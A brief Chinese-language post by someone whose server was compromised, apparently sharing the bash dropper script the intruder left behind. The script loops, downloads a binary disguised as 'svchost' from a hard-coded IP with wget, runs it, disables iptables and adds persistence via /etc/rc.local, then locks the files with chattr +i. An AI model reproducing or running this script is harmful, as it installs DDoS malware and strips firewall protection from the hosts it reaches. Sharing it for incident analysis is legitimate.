系统被入侵，被人家植入 DDOS 木马发现一个脚本.

#!/bin/bash

DOWNURL="http://183.60.202.209:44335/"
DOWNDIR="/bin/"

run_proc()
{
chmod 777 $DOWNDIR$1
nohup $DOWNDIR$1 > /dev/null 2>&1 &
[ -z "`grep -w \"iptables stop\" /etc/rc.local`" ] && echo "/etc/init.d/iptables stop" >> /etc/rc.local
[ -z "`grep -w $DOWNDIR$1 /etc/rc.local`" ] && echo "$DOWNDIR$1 &" >> /etc/rc.local
[ -f "/etc/$1" ] && chattr -i /etc/$1 && \rm -rf /etc/$1
\cp $DOWNDIR$1 /etc/$1
chattr +i /etc/$1
chattr +i $DOWNDIR$1
}

check_proc()
{
if [ -z "`ps -A|grep -w $1`" ];then
if [ ! -f "$DOWNDIR$1" ];then
wget "$DOWNURL$1" -O "$DOWNDIR$1" > /dev/null 2>&1
fi
if [ -f "$DOWNDIR$1" ];then
run_proc $1
fi
fi
}

while [ 1 ]
do
check_proc "svchost"
sleep 3
done
========================================
http://183.60.202.209:44335 里面有黑客的工具可惜都是编译之后的。